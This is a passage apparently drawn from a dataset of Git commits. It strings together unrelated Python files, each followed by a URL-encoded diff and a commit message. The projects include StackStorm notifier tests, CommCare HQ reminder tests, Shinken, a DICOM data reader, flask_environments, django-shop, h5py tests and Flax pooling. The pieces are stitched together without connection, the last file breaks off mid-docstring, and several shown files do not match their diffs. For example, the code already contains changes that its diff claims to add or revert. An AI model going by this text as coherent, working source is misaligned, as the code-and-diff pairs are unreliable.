                if args[0] == self.notify_trigger:
                    self.tester.assertEqual(payload['status'], 'succeeded')
                    self.tester.assertTrue('execution_id' in payload)
                    self.tester.assertTrue('start_timestamp' in payload)
                    self.tester.assertTrue('end_timestamp' in payload)
                    self.tester.assertEqual('core.local', payload['action_ref'])
                    self.tester.assertEqual('Action succeeded.', payload['message'])
                    self.tester.assertTrue('data' in payload)
                # Assertions for the generic action trigger payload.
                if args[0] == self.action_trigger:
                    self.tester.assertEqual(payload['status'], 'succeeded')
                    self.tester.assertTrue('execution_id' in payload)
                    self.tester.assertTrue('start_timestamp' in payload)
                    self.tester.assertEqual('core.local', payload['action_name'])
                    self.tester.assertTrue('result' in payload)
                    self.tester.assertTrue('parameters' in payload)
            except Exception:
                # NOTE(review): this swallows the original assertion error, so
                # failures give no hint of which check broke — consider
                # re-raising or including the exception text in the message.
                self.tester.fail('Test failed')

    def test_notify_triggers(self):
        # Build a minimal successful liveaction with notify rules attached;
        # processing it should route payloads through MockDispatcher.dispatch.
        liveaction = LiveActionDB(action='core.local')
        liveaction.description = ''
        liveaction.status = 'succeeded'
        liveaction.parameters = {}
        on_success = NotificationSubSchema(message='Action succeeded.')
        on_failure = NotificationSubSchema(message='Action failed.')
        liveaction.notify = NotificationSchema(on_success=on_success,
                                               on_failure=on_failure)
        liveaction.start_timestamp = datetime.datetime.utcnow()

        dispatcher = NotifierTestCase.MockDispatcher(self)
        notifier = Notifier(None, [], trigger_dispatcher=dispatcher)
        notifier.process(liveaction)
|
Python
| 0
|
@@ -3780,14 +3780,32 @@
ier(
-None,
+connection=None, queues=
%5B%5D,
|
cf35695481b703e49fbc00e286ef6380a8aec394
|
Remove invalid test
|
corehq/apps/notifications/tests/test_views.py
|
corehq/apps/notifications/tests/test_views.py
|
from unittest.mock import patch
from corehq.apps.accounting.models import Subscription
from corehq.apps.groups.models import Group
from ..views import NotificationsServiceRMIView
def test_should_hide_feature_notifs_for_pro_with_groups():
    """Pro plan + case-sharing groups -> feature notifications are hidden."""
    with case_sharing_groups_patch(['agroupid']):
        hide = NotificationsServiceRMIView._should_hide_feature_notifs("test", "pro")
        assert hide, "notifications should be hidden for pro domain with groups"
def test_should_hide_feature_notifs_for_pro_without_groups():
    """Pro plan, no groups, ordinary service type -> notifications shown."""
    with case_sharing_groups_patch([]), active_service_type_patch("not_IMPLEMENTATION_or_SANDBOX"):
        hide = NotificationsServiceRMIView._should_hide_feature_notifs("test", "pro")
        assert not hide, "notifications should not be hidden for pro domain without groups"
def test_should_hide_feature_notifs_for_non_pro_with_groups():
    """Non-pro plan (None) with groups -> notifications shown."""
    with case_sharing_groups_patch(['agroupid']), active_service_type_patch("not_IMPLEMENTATION_or_SANDBOX"):
        hide = NotificationsServiceRMIView._should_hide_feature_notifs("test", None)
        assert not hide, "notifications should not be hidden for pro domain without groups"
def test_should_hide_feature_notifs_for_implementation_subscription():
    """IMPLEMENTATION service type -> notifications hidden regardless of groups."""
    with case_sharing_groups_patch([]), active_service_type_patch("IMPLEMENTATION"):
        hide = NotificationsServiceRMIView._should_hide_feature_notifs("test", "pro")
        assert hide, "notifications should be hidden for IMPLEMENTATION subscription"
def test_should_hide_feature_notifs_for_sandbox_subscription():
    """SANDBOX service type -> notifications hidden regardless of groups."""
    with case_sharing_groups_patch([]), active_service_type_patch("SANDBOX"):
        hide = NotificationsServiceRMIView._should_hide_feature_notifs("test", "pro")
        assert hide, "notifications should be hidden for SANDBOX subscription"
def test_should_hide_feature_notifs_bug():
    """Regression: a domain with no active subscription must not crash and must show notifications."""
    with case_sharing_groups_patch([]), active_service_type_patch():
        hide = NotificationsServiceRMIView._should_hide_feature_notifs("test", None)
        assert not hide, "notifications should not be hidden for null subscription"
def active_service_type_patch(service_type=None):
    """Patch Subscription.get_active_subscription_by_domain to return a fixed value.

    With service_type=None the patched getter returns None (no active subscription);
    otherwise it returns an unsaved Subscription with that service_type.
    """
    if service_type is None:
        stub = None
    else:
        stub = Subscription(service_type=service_type)

    def fake_getter(domain):
        return stub

    return patch.object(Subscription, "get_active_subscription_by_domain", fake_getter)
def case_sharing_groups_patch(groups):
    """Patch Group.get_case_sharing_groups to return `groups` verbatim.

    Patched because quickcache makes the real method hard to exercise in tests.
    """
    def fake_get_case_sharing_groups(domain, wrap):
        assert not wrap, "expected wrap to be false"
        return groups

    return patch.object(Group, "get_case_sharing_groups", fake_get_case_sharing_groups)
|
Python
| 0
|
@@ -800,360 +800,8 @@
%22%0A%0A%0A
-def test_should_hide_feature_notifs_for_non_pro_with_groups():%0A with case_sharing_groups_patch(%5B'agroupid'%5D), active_service_type_patch(%22not_IMPLEMENTATION_or_SANDBOX%22):%0A hide = NotificationsServiceRMIView._should_hide_feature_notifs(%22test%22, None)%0A assert not hide, %22notifications should not be hidden for pro domain without groups%22%0A%0A%0A
def
|
a5bfcca31ea3d8ed1f55cee96b5652c789f6600e
|
Fix #1801: contact downtime log spam ...
|
shinken/contactdowntime.py
|
shinken/contactdowntime.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
import time
from shinken.log import logger
""" TODO: Add some comment about this class for the doc"""
class ContactDowntime:
    """Scheduled downtime for a contact.

    Far simpler than a host/service downtime: just a [start_time, end_time]
    window, plus an author and a comment for logging purposes. Log entries
    are raised on the referenced object when the window is entered and left.
    """

    id = 1

    # Just to list the properties we will send as pickle
    # to other daemons, so all but NOT REF.
    properties = {
        'start_time': None,
        'end_time': None,
        'author': None,
        'comment': None,
        'is_in_effect': None,
        'can_be_deleted': None,
    }

    def __init__(self, ref, start_time, end_time, author, comment):
        """Schedule a contact downtime on `ref` between the two timestamps."""
        self.id = self.__class__.id
        self.__class__.id += 1
        self.ref = ref  # pointer to srv or host we are apply
        self.start_time = start_time
        self.end_time = end_time
        self.author = author
        self.comment = comment
        self.is_in_effect = False
        self.can_be_deleted = False

    def check_activation(self):
        """Enter or exit the downtime based on the current time, logging transitions."""
        now = time.time()
        was_is_in_effect = self.is_in_effect
        self.is_in_effect = (self.start_time <= now <= self.end_time)
        # BUG FIX (#1801): demoted from logger.info to logger.debug — this
        # trace line was spamming the log at INFO level.
        logger.debug("CHECK ACTIVATION:%s", self.is_in_effect)

        # Raise a log entry when we get in the downtime
        if not was_is_in_effect and self.is_in_effect:
            self.enter()

        # Same for exit purpose
        if was_is_in_effect and not self.is_in_effect:
            self.exit()

    def in_scheduled_downtime(self):
        """Return True while the downtime window is active."""
        return self.is_in_effect

    def enter(self):
        """The referenced object enters the downtime: raise the 'enter' log entry."""
        self.ref.raise_enter_downtime_log_entry()

    def exit(self):
        """The end of the downtime was reached: log it and mark for deletion."""
        self.ref.raise_exit_downtime_log_entry()
        self.can_be_deleted = True

    def cancel(self):
        """A scheduled downtime was prematurely canceled."""
        self.is_in_effect = False
        self.ref.raise_cancel_downtime_log_entry()
        self.can_be_deleted = True

    def __getstate__(self):
        """Serialize for pickle WITHOUT the ref back-pointer.

        Returns [last_prop, ..., first_prop, id] so that __setstate__ can
        pop() values back in declaration order.
        """
        cls = self.__class__
        # id is not in *_properties
        res = [self.id]
        for prop in cls.properties:
            res.append(getattr(self, prop))
        # We reverse because we want to recreate
        # by popping at properties in the same order.
        res.reverse()
        return res

    def __setstate__(self, state):
        """Inverse of __getstate__; also keeps the class id counter ahead."""
        cls = self.__class__
        self.id = state.pop()
        for prop in cls.properties:
            val = state.pop()
            setattr(self, prop, val)
        # Keep the class-level id counter above any restored instance id.
        if self.id >= cls.id:
            cls.id = self.id + 1
|
Python
| 0
|
@@ -2500,12 +2500,13 @@
ger.
-info
+debug
(%22CH
|
b769c027b1db7a419f916e3961d0b746eef7c666
|
move import SimpleITK back into function
|
src/datareader.py
|
src/datareader.py
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
""" Module for readin 3D dicom data
"""
# import funkcí z jiného adresáře
import sys
import os.path
path_to_script = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(path_to_script, "../extern/pyseg_base/src"))
sys.path.append(os.path.join(path_to_script,
"../extern/py3DSeedEditor/"))
#sys.path.append(os.path.join(path_to_script, "../extern/"))
#import featurevector
import logging
logger = logging.getLogger(__name__)
# -------------------- my scripts ------------
import dcmreaddata as dcmr
import SimpleITK as sitk
import numpy as np
class DataReader:
    """Reads 3D medical volumes from pickle dumps, raw image files, DICOM
    directories, or plain image sequences, returning data + metadata."""

    def __init__(self):
        # Callable that produces overlay dictionaries; set only when a DICOM
        # directory is read (see Get3DData), otherwise stays None.
        self.overlay_fcn = None

    def Get3DData(self, datapath, qt_app=None,
                  dataplus_format=False, gui=False,
                  start=0, stop=None, step=1):
        """
        :datapath directory with input data
        :qt_app if it is set to None (as default) all dialogs for series
            selection are performed in terminal. If qt_app is set to
            QtGui.QApplication() dialogs are in Qt.

        :dataplus_format is new data format. Metadata and data are returned in
            one structure.

        start/stop/step select a slice range; they are honored only for the
        DICOM-directory branch.
        """
        if qt_app is None and gui is True:
            # Local import so that non-GUI use does not require PyQt4.
            from PyQt4.QtGui import QApplication
            qt_app = QApplication(sys.argv)

        datapath = os.path.normpath(datapath)
        if os.path.isfile(datapath):
            path, ext = os.path.splitext(datapath)
            if ext in ('.pklz', '.pkl'):
                # Pickled dataplus dump: data3d plus arbitrary metadata keys.
                import misc
                data = misc.obj_from_file(datapath, filetype='pkl')
                data3d = data.pop('data3d')
                # metadata must have series_number
                metadata = {
                    'series_number': 0,
                    'datadir': datapath
                }
                metadata.update(data)

            else:
                # reading raw file
                image = sitk.ReadImage(datapath)
                # image = sitk.ReadImage('/home/mjirik/data/medical/data_orig/sliver07/01/liver-orig001.mhd') #noqa

                # sz = image.GetSize()

                # data3d = sitk.Image(sz[0],sz[1],sz[2], sitk.sitkInt16)

                # for i in range(0,sz[0]):
                #     print i
                #     for j in range(0,sz[1]):
                #         for k in range(0,sz[2]):
                #             data3d[i,j,k]=image[i,j,k]

                data3d = sitk.GetArrayFromImage(image)  # + 1024
                # data3d = np.transpose(data3d)
                # data3d = np.rollaxis(data3d,1)
                metadata = {}  # reader.get_metaData()
                metadata['series_number'] = 0  # reader.series_number
                metadata['datadir'] = datapath
                spacing = image.GetSpacing()
                # NOTE(review): spacing axes are reordered (z, x, y) here —
                # presumably to match the numpy array's axis order; confirm.
                metadata['voxelsize_mm'] = [
                    spacing[2],
                    spacing[0],
                    spacing[1],
                ]

        else:
            # checks if data is in DICOM format
            dir_type = 'images'
            if dcmr.is_dicom_dir(datapath):
                dir_type = 'dicom'

            if dir_type == 'dicom':  # reading dicom
                logger.debug('Dir - DICOM')
                reader = dcmr.DicomReader(datapath, qt_app=None, gui=True)
                data3d = reader.get_3Ddata(start, stop, step)
                metadata = reader.get_metaData()
                metadata['series_number'] = reader.series_number
                metadata['datadir'] = datapath
                self.overlay_fcn = reader.get_overlay
            else:  # reading image sequence
                logger.debug('Dir - Image sequence')

                logger.debug('Getting list of readable files...')
                flist = []
                for f in os.listdir(datapath):
                    # Probe-read each file; unreadable files are skipped with
                    # a warning rather than aborting the whole sequence.
                    try:
                        sitk.ReadImage(os.path.join(datapath, f))
                    except:
                        logger.warning("Cant load file: "+str(f))
                        continue
                    flist.append(os.path.join(datapath, f))
                flist.sort()

                logger.debug('Reading image data...')
                image = sitk.ReadImage(flist)

                logger.debug('Getting numpy array from image data...')
                data3d = sitk.GetArrayFromImage(image)

                metadata = {}  # reader.get_metaData()
                metadata['series_number'] = 0  # reader.series_number
                metadata['datadir'] = datapath
                spacing = image.GetSpacing()
                metadata['voxelsize_mm'] = [
                    spacing[2],
                    spacing[0],
                    spacing[1],
                ]

        if dataplus_format:
            # New-style return: single dict carrying metadata plus data3d.
            logger.debug('dataplus format')
            datap = metadata
            datap['data3d'] = data3d
            logger.debug('datap keys () : ' + str(datap.keys()))
            return datap
        else:
            # Legacy return: (data3d, metadata) tuple.
            return data3d, metadata

    def GetOverlay(self):
        """ Generates dictionary of ovelays

        Returns {} unless a DICOM directory was read by Get3DData.
        """
        if self.overlay_fcn == None:  # noqa
            return {}
        else:
            return self.overlay_fcn()
def get_datapath_qt(qt_app):
    """Delegate to dcmreaddata's Qt data-path selection."""
    return dcmr.get_datapath_qt(qt_app)
|
Python
| 0
|
@@ -593,33 +593,8 @@
mr%0A%0A
-import SimpleITK as sitk%0A
impo
@@ -1895,16 +1895,57 @@
aw file%0A
+ import SimpleITK as sitk%0A
|
9df00bbfa829006396c2a6718e4540410b27c4c6
|
Clear the job queue upon kolibri initialization.
|
kolibri/tasks/apps.py
|
kolibri/tasks/apps.py
|
from __future__ import absolute_import, print_function, unicode_literals
from django.apps import AppConfig
class KolibriTasksConfig(AppConfig):
    """Django app configuration for the kolibri.tasks app."""
    name = 'kolibri.tasks'
    label = 'kolibritasks'
    verbose_name = 'Kolibri Tasks'

    def ready(self):
        # No app-startup work is performed yet.
        pass
|
Python
| 0
|
@@ -263,9 +263,74 @@
-pass
+from kolibri.tasks.api import client%0A client.clear(force=True)
%0A
|
6a6cb75ad2c29435d74768aa88c5d925570a6ad0
|
Add some meta
|
flask_environments.py
|
flask_environments.py
|
import os
import yaml
from flask import current_app
class Environments(object):
    """Flask extension that selects configuration by environment name.

    The environment name is read from the environment variable `var_name`
    (default 'FLASK_ENV'), falling back to `default_env`.
    """

    def __init__(self, app=None, var_name=None, default_env=None):
        """
        :param app: optional Flask app to initialize immediately
        :param var_name: environment variable to inspect (default 'FLASK_ENV')
        :param default_env: environment name used when the variable is unset
        """
        self.app = app
        self.var_name = var_name or 'FLASK_ENV'
        self.default_env = default_env or 'DEVELOPMENT'
        self.env = os.environ.get(self.var_name, self.default_env)

        if app is not None:
            self.init_app(app)

    def init_app(self, app):
        """Record the active environment on the app and register this extension."""
        # NOTE(review): 'ENVIORNMENT' is misspelled but is the published config
        # key -- renaming it would break existing apps, so it stays as-is.
        app.config['ENVIORNMENT'] = self.env

        if app.extensions is None:
            app.extensions = {}
        app.extensions['environments'] = self

    def get_app(self, reference_app=None):
        """Return the explicit app, the bound app, or fall back to current_app."""
        if reference_app is not None:
            return reference_app
        if self.app is not None:
            return self.app
        return current_app

    def from_object(self, config_obj):
        """Load config from '<config_obj>.<EnvName>' if such an object exists,
        otherwise fall back to config_obj itself."""
        app = self.get_app()
        for name in self._possible_names():
            try:
                obj = '%s.%s' % (config_obj, name)
                app.config.from_object(obj)
                return
            except Exception:
                # This candidate environment object doesn't exist; try the
                # next spelling. (Was a bare `except:`, which also swallowed
                # SystemExit/KeyboardInterrupt.)
                pass
        app.config.from_object(config_obj)

    def from_yaml(self, path):
        """Load upper-case config keys for the active environment from a YAML file."""
        with open(path) as f:
            # NOTE(review): yaml.load on an untrusted file is unsafe; prefer
            # yaml.safe_load if the config can come from outside the project.
            c = yaml.load(f)

        for name in self._possible_names():
            try:
                c = c[name]
            except Exception:
                # Key absent under this spelling; keep the current mapping.
                pass

        app = self.get_app()
        # BUG FIX: dict.iterkeys() is Python 2 only; plain iteration over the
        # mapping works on both Python 2 and 3.
        for key in c:
            if key.isupper():
                app.config[key] = c[key]

    def _possible_names(self):
        """Candidate spellings of the environment name: as-is, Capitalized, lowercase."""
        return (self.env, self.env.capitalize(), self.env.lower())
|
Python
| 0.000134
|
@@ -1,16 +1,249 @@
+# -*- coding: utf-8 -*-%0A%22%22%22%0A flask_environments%0A ~~~~~~~~~~~~~~~~~~%0A%0A Environment tools and configuration for Flask applications%0A%0A :copyright: (c) 2012 by Matt Wright.%0A :license: MIT, see LICENSE for more details.%0A%22%22%22%0A
%0Aimport os%0A%0Aimpo
|
cff83c316663975af2e838cbd8c365a68079c369
|
In plugin child_plugin_instances may be None
|
shop/cascade/extensions.py
|
shop/cascade/extensions.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from cms.plugin_pool import plugin_pool
from cmsplugin_cascade.plugin_base import TransparentContainer
from .plugin_base import ShopPluginBase
class ShopExtendableMixin(object):
    """
    Add this mixin class to the list of ``model_mixins``, in the plugin class wishing to use extensions.
    """
    @property
    def left_extension(self):
        """First child plugin of type ShopLeftExtension, or None if absent."""
        # BUG FIX: child_plugin_instances may be None (no children resolved
        # yet), which previously raised TypeError when iterated.
        if self.child_plugin_instances is None:
            return
        result = [cp for cp in self.child_plugin_instances if cp.plugin_type == 'ShopLeftExtension']
        if result:
            return result[0]

    @property
    def right_extension(self):
        """First child plugin of type ShopRightExtension, or None if absent."""
        # BUG FIX: same None guard as left_extension.
        if self.child_plugin_instances is None:
            return
        result = [cp for cp in self.child_plugin_instances if cp.plugin_type == 'ShopRightExtension']
        if result:
            return result[0]
class LeftRightExtensionMixin(object):
    """
    Plugin classes wishing to use extensions shall inherit from this class.
    """
    @classmethod
    def get_child_classes(cls, slot, page, instance=None):
        """Return the allowed child plugin types, dropping extensions already present."""
        # Start from the full set: one left and one right extension allowed.
        allowed = ['ShopLeftExtension', 'ShopRightExtension', None]
        # allow only one left and one right extension
        for existing in instance.get_children():
            allowed.remove(existing.plugin_type)
        return allowed
class ShopLeftExtension(TransparentContainer, ShopPluginBase):
    """Transparent container plugin for the left extension slot of cart/order views."""
    name = _("Left Extension")
    require_parent = True
    # Only usable inside the cart and order views plugins.
    parent_classes = ('ShopCartPlugin', 'ShopOrderViewsPlugin')
    allow_children = True
    render_template = 'cascade/generic/naked.html'

plugin_pool.register_plugin(ShopLeftExtension)
class ShopRightExtension(TransparentContainer, ShopPluginBase):
    """Transparent container plugin for the right extension slot of cart/order views."""
    name = _("Right Extension")
    require_parent = True
    # Only usable inside the cart and order views plugins.
    parent_classes = ('ShopCartPlugin', 'ShopOrderViewsPlugin')
    allow_children = True
    render_template = 'cascade/generic/naked.html'

plugin_pool.register_plugin(ShopRightExtension)
|
Python
| 0.999998
|
@@ -452,32 +452,99 @@
xtension(self):%0A
+ if self.child_plugin_instances is None:%0A return%0A
result =
@@ -714,32 +714,99 @@
xtension(self):%0A
+ if self.child_plugin_instances is None:%0A return%0A
result =
|
77e5dcc8592686202045a79cea293af602ed5d49
|
delete is trickle-down, so I think this is more precise
|
corehq/apps/reminders/tests/test_recipient.py
|
corehq/apps/reminders/tests/test_recipient.py
|
from django.test import TestCase
from corehq.apps.domain.models import Domain
from corehq.apps.locations.models import SQLLocation, LocationType
from corehq.apps.reminders.models import CaseReminder, CaseReminderHandler
from corehq.apps.users.models import CommCareUser
from corehq.form_processor.tests.utils import run_with_all_backends
from corehq.util.test_utils import create_test_case
from mock import patch
class ReminderRecipientTest(TestCase):
    """Checks CASE_OWNER_LOCATION_PARENT recipient resolution as locations,
    the user, and the case are progressively removed."""
    domain = 'reminder-recipient-test'

    def setUp(self):
        self.domain_obj = Domain(name=self.domain)
        self.domain_obj.save()

        # Two-level location hierarchy: parent type -> child type.
        self.parent_location_type = LocationType.objects.create(
            domain=self.domain,
            name='parent type',
            code='parent'
        )

        self.child_location_type = LocationType.objects.create(
            domain=self.domain,
            name='child type',
            code='child',
            parent_type=self.parent_location_type
        )

        self.user = CommCareUser.create(self.domain, 'test', 'test')

    def tearDown(self):
        # Delete in reverse dependency order.
        self.parent_location_type.delete()
        self.child_location_type.delete()
        self.user.delete()
        self.domain_obj.delete()

    @run_with_all_backends
    def test_recipient_case_owner_location_parent(self):
        parent_location = SQLLocation.objects.create(
            domain=self.domain,
            name='parent test',
            site_code='parent',
            location_type=self.parent_location_type
        )

        child_location = SQLLocation.objects.create(
            domain=self.domain,
            name='child test',
            site_code='child',
            location_type=self.child_location_type,
            parent=parent_location
        )

        # The user (case owner) sits at the child location, so the recipient
        # should resolve to the parent location.
        self.user.set_location(child_location)

        with create_test_case(self.domain, 'test-case', 'test-name', owner_id=self.user.get_id) as case:
            self.assertEqual(case.owner_id, self.user.get_id)

            handler = CaseReminderHandler(domain=self.domain, recipient='CASE_OWNER_LOCATION_PARENT')
            reminder = CaseReminder(domain=self.domain, case_id=case.case_id)

            # Test the recipient is returned correctly
            with patch('corehq.apps.reminders.models.CaseReminder.handler', new=handler):
                self.assertEqual(reminder.recipient, [parent_location])

            # Remove parent location -> no recipient can be resolved.
            parent_location.delete()
            child_location.parent = None
            child_location.save()
            with patch('corehq.apps.reminders.models.CaseReminder.handler', new=handler):
                self.assertIsNone(reminder.recipient)

            # Remove child location -> still no recipient.
            self.user = CommCareUser.get(self.user._id)
            self.user.unset_location()
            child_location.delete()
            with patch('corehq.apps.reminders.models.CaseReminder.handler', new=handler):
                self.assertIsNone(reminder.recipient)

            # Remove case -> still no recipient.
            reminder.case_id = None
            with patch('corehq.apps.reminders.models.CaseReminder.handler', new=handler):
                self.assertIsNone(reminder.recipient)
|
Python
| 0.000012
|
@@ -2408,45 +2408,8 @@
ion%0A
- parent_location.delete()%0A
@@ -2475,24 +2475,61 @@
tion.save()%0A
+ parent_location.delete()%0A
@@ -2701,64 +2701,8 @@
ion%0A
- self.user = CommCareUser.get(self.user._id)%0A
|
bb5cbae79ef8efb8d0b7dd3ee95e76955317d3d7
|
Fix for broken container security test
|
tests/integration/api/test_sc_test_jobs.py
|
tests/integration/api/test_sc_test_jobs.py
|
from tests.base import BaseTest
from tenable_io.api.models import ScTestJob
class TestScTestJobsApi(BaseTest):
    """Integration tests for the container-security test-jobs API."""

    def test_status(self, client, image):
        """status() returns an ScTestJob for an existing job id."""
        jobs = client.sc_test_jobs_api.list()
        assert len(jobs) > 0, u'At least one job exists.'
        test_job = client.sc_test_jobs_api.status(jobs[0].job_id)
        assert isinstance(test_job, ScTestJob), u'The method returns type.'

    def test_by_image(self, client, image):
        """by_image() looks up a job by image id."""
        job = client.sc_test_jobs_api.by_image(image['id'])
        assert isinstance(job, ScTestJob), u'The method returns type.'

    def test_by_image_digest(self, client, image):
        """by_image_digest() looks up a job by image digest."""
        # BUG FIX: previously called by_image() with a digest, so the
        # digest-specific endpoint was never actually exercised.
        job = client.sc_test_jobs_api.by_image_digest(image['digest'])
        assert isinstance(job, ScTestJob), u'The method returns type.'

    def test_list(self, client, image):
        """list() returns a non-empty list of ScTestJob instances."""
        jobs = client.sc_test_jobs_api.list()
        assert len(jobs) > 0, u'At least one job exists.'
        assert isinstance(jobs[0], ScTestJob), u'The method returns job list.'
|
Python
| 0
|
@@ -662,32 +662,39 @@
obs_api.by_image
+_digest
(image%5B'digest'%5D
|
db6e23671a82a76afc13b4a69422a6b0d3c381df
|
Rearrange tests
|
h5py/tests/high/test_hlobject.py
|
h5py/tests/high/test_hlobject.py
|
from tempfile import mktemp
from h5py import tests
import h5py
class Base(tests.HTest):
    """Creates a scratch HDF5 file for each test and removes it afterwards."""

    def setUp(self):
        self.name = mktemp()
        self.f = h5py.File(self.name, 'w')

    def tearDown(self):
        import os
        try:
            if self.f:
                self.f.close()
        finally:
            # Remove the scratch file even if closing raised.
            if self.name and os.path.exists(self.name):
                os.unlink(self.name)
class TestComparison(Base):
    """Equality semantics of high-level objects (files vs groups)."""

    def test_eq(self):
        """ (HLObject) __eq__ and __ne__ are opposite (files and groups) """
        g1 = self.f.create_group('a')
        g2 = self.f['a']   # same underlying group as g1
        g3 = self.f.create_group('b')
        f1 = self.f
        f2 = g1.file
        self.assert_(g1 == g2)
        self.assert_(not g1 != g2)
        self.assert_(g1 != g3)
        self.assert_(not g1 == g3)
        self.assert_(f1 == f2)
        self.assert_(not f1 != f2)

    def test_grp(self):
        """ (HLObject) File objects don't compare equal to root group """
        g = self.f['/']
        self.assert_(not g == self.f)
        self.assert_(g != self.f)
class TestPropFile(Base):
    """The .file property resolves to the owning File on any object."""

    def test_file2(self):
        """ (HLObject) .file property on subclasses """
        g = self.f.create_group('foo')
        g2 = self.f.create_group('foo/bar')
        self.assertEqual(self.f, self.f.file)
        self.assertEqual(self.f, g.file)
        self.assertEqual(self.f, g2.file)
class TestProps(Base):
    """Private link-creation/access property lists (HDF5 1.8 API only)."""

    @tests.require(api=18)
    def test_lcpl(self):
        """ (HLObject) lcpl """
        lcpl = self.f._lcpl
        self.assertIsInstance(lcpl, h5py.h5p.PropLCID)

    @tests.require(api=18)
    def test_lapl(self):
        """ (HLObject) lapl """
        lapl = self.f._lapl
        self.assertIsInstance(lapl, h5py.h5p.PropLAID)
class TestParent(Base):
    """The .parent property walks up the group hierarchy."""

    def test_parent(self):
        """ (HLObject) .parent """
        # The file's parent is its own root group.
        self.assertEqual(self.f.parent, self.f['/'])
        g = self.f.create_group('a')
        g2 = self.f.create_group('a/b')
        self.assertEqual(g2.parent, g)
        self.assertEqual(g.parent, self.f['/'])
|
Python
| 0.000015
|
@@ -1085,20 +1085,17 @@
TestProp
-File
+s
(Base):%0A
@@ -1154,31 +1154,8 @@
ile
-property on subclasses
%22%22%22%0A
@@ -1363,24 +1363,304 @@
, g2.file)%0A%0A
+ def test_parent(self):%0A %22%22%22 (HLObject) .parent %22%22%22%0A self.assertEqual(self.f.parent, self.f%5B'/'%5D)%0A g = self.f.create_group('a')%0A g2 = self.f.create_group('a/b')%0A self.assertEqual(g2.parent, g)%0A self.assertEqual(g.parent, self.f%5B'/'%5D)%0A%0A
class TestPr
@@ -2011,311 +2011,8 @@
D)%0A%0A
-class TestParent(Base):%0A%0A def test_parent(self):%0A %22%22%22 (HLObject) .parent %22%22%22%0A self.assertEqual(self.f.parent, self.f%5B'/'%5D)%0A g = self.f.create_group('a')%0A g2 = self.f.create_group('a/b')%0A self.assertEqual(g2.parent, g)%0A self.assertEqual(g.parent, self.f%5B'/'%5D)
%0A%0A%0A%0A
|
6594bb843998ee22b0a12036a0e16c1fd625fd03
|
Revert "Catch Validation error"
|
shop/context_processors.py
|
shop/context_processors.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.forms.utils import ValidationError
from shop.models.customer import CustomerModel
def customer(request):
    """
    Add the customer to the RequestContext
    """
    msg = "The request object does not contain a customer. Edit your MIDDLEWARE_CLASSES setting to insert 'shop.middlerware.CustomerMiddleware'."
    assert hasattr(request, 'customer'), msg
    context = {
        'customer': request.customer,
        'site_header': settings.SHOP_APP_LABEL.capitalize(),
    }
    if request.user.is_staff:
        # Staff members may emulate another customer via the session key.
        try:
            emulated = CustomerModel.objects.get(pk=request.session['emulate_user_id'])
        except (CustomerModel.DoesNotExist, KeyError, AttributeError, ValidationError):
            pass
        else:
            context['customer'] = emulated
    return context
|
Python
| 0
|
@@ -57,17 +57,16 @@
iterals%0A
-%0A
from dja
@@ -94,55 +94,8 @@
ngs%0A
-from django.forms.utils import ValidationError%0A
from
@@ -751,25 +751,8 @@
rror
-, ValidationError
):%0A
|
ff97879ca25eb1e9e4a90308236e367354900da8
|
Add count_include_pad argument to flax.linen.pooling.avg_pool
|
flax/linen/pooling.py
|
flax/linen/pooling.py
|
# Copyright 2022 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pooling modules."""
from jax import lax
import jax.numpy as jnp
import numpy as np
def pool(inputs, init, reduce_fn, window_shape, strides, padding):
  """Helper function to define pooling functions.

  Pooling functions are implemented using the ReduceWindow XLA op.
  NOTE: Be aware that pooling is not generally differentiable.
  That means providing a reduce_fn that is differentiable does not imply that
  pool is differentiable.

  Args:
    inputs: input data with dimensions (batch, window dims..., features).
    init: the initial value for the reduction
    reduce_fn: a reduce function of the form `(T, T) -> T`.
    window_shape: a shape tuple defining the window to reduce over.
    strides: a sequence of `n` integers, representing the inter-window
      strides (default: `(1, ..., 1)`).
    padding: either the string `'SAME'`, the string `'VALID'`, or a sequence
      of `n` `(low, high)` integer pairs that give the padding to apply before
      and after each spatial dimension.
  Returns:
    The output of the reduction for each window slice.
  """
  strides = strides or (1,) * len(window_shape)
  assert len(window_shape) == len(strides), (
      f"len({window_shape}) must equal len({strides})")
  # Extend strides/window with singleton batch and feature dimensions so they
  # match the rank reduce_window expects.
  strides = (1,) + strides + (1,)
  dims = (1,) + window_shape + (1,)

  is_single_input = False
  if inputs.ndim == len(dims) - 1:
    # add singleton batch dimension because lax.reduce_window always
    # needs a batch dimension.
    inputs = inputs[None]
    is_single_input = True

  assert inputs.ndim == len(dims), f"len({inputs.shape}) != len({dims})"
  if not isinstance(padding, str):
    # Explicit per-dimension padding: validate and extend with zero padding
    # for the batch and feature dimensions.
    padding = tuple(map(tuple, padding))
    assert len(padding) == len(window_shape), (
        f"padding {padding} must specify pads for same number of dims as "
        f"window_shape {window_shape}")
    assert all([len(x) == 2 for x in padding]), (
        f"each entry in padding {padding} must be length 2")
    padding = ((0, 0),) + padding + ((0, 0),)
  y = lax.reduce_window(inputs, init, reduce_fn, dims, strides, padding)
  if is_single_input:
    # Drop the batch dimension we added above.
    y = jnp.squeeze(y, axis=0)
  return y
def avg_pool(inputs, window_shape, strides=None, padding="VALID", count_include_pad=True):
  """Pools the input by taking the average over a window.

